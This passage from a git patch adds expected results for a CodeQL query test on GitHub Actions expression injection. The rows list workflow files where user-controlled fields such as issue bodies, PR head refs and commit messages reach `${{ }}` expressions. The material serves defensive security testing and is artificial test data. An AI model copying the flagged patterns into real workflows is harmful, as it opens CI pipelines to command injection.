| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From 86075c95bd5293284dadc34f02d27c2f1c3801af Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 22:28:54 +0100 Subject: [PATCH 0088/1267] Improve ExpressionNode Location handling --- ql/lib/codeql/actions/Ast.qll | 22 +++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 9 +++++--- 2 files changed, 19 insertions(+), 12 deletions(-) 
